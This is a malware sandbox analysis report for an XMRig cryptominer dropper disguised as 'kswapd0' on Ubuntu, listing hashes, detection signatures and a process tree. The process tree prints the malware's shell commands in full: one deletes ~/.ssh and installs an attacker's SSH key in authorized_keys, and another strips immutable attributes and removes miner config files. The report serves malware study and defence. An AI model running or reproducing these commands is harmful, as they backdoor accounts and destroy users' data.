Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    600s
  • max time network
    545s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240221-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
  • submitted
    15/04/2024, 16:01

General

  • Target

    .rsync/a/kswapd0

  • Size

    2.1MB

  • MD5

    8da798989b6e48fb211674b652119a8c

  • SHA1

    ffe36761ebc571f086d06e8a3b5cb3adc5ce8deb

  • SHA256

    8acfbcd3da37b25ae2f2d88115c4b1b05c75e2e9face918e3f21fa10cc3126b4

  • SHA512

    1859b99e1cfa246807d51cec8441b00d0a21251d46198a92b10e7bcf3a4d764a48ba54953da2d79cdbb2d9e29d95d2a6c86c2a34e0968409dbedf9baff807f3b

  • SSDEEP

    49152:XNcjlR90c88OeWSUiyLspBFLKb52pzTduYRSt4rxIugUWsfCfbws:9WPQheWvi9TKV29TdjxICWeCTws

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Attempts to change immutable files 2 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 45 IoCs
  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Enumerates kernel/hardware configuration 1 TTPs 23 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 6 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/.rsync/a/kswapd0
    /tmp/.rsync/a/kswapd0
    1⤵
    • Checks CPU configuration
    • Checks hardware identifiers (DMI)
    • Reads CPU attributes
    • Reads hardware information
    • Enumerates kernel/hardware configuration
    • Reads runtime system information
    • Writes file to tmp directory
    PID:1477
    • /bin/sh
      sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
      2⤵
        PID:1478
      • /bin/sh
        sh -c "chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json"
        2⤵
          PID:1482
          • /usr/bin/chattr
            chattr -ia "~/.xmrig.json"
            3⤵
            • Attempts to change immutable files
            PID:1483
          • /usr/bin/rm
            rm -rf "~/.xmrig.json"
            3⤵
              PID:1484
            • /usr/bin/chattr
              chattr -ia "~/.config/xmrig.json"
              3⤵
              • Attempts to change immutable files
              PID:1485
            • /usr/bin/rm
              rm -rf "~/.config/xmrig.json"
              3⤵
                PID:1486

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /tmp/.rsync/a/cert_key.pem

            Filesize

            1KB

            MD5

            f9ea8500b4befc772765e5711a8c4a6e

            SHA1

            0cef587824970c06cdf95cad8f58edcc1118d62e

            SHA256

            73d2b01c97ed035547824acd7870c299a6adedffa5eb1a47855362fa644c2a7c

            SHA512

            e66b0fb3a1b8511c921fd0b1bdcbecf08cfc939bd250043b1b7ca40af41474cb57d6e0e8309bc0869e545a53d93d1012a1aeee21cf8d7cf13530b2ce391920e3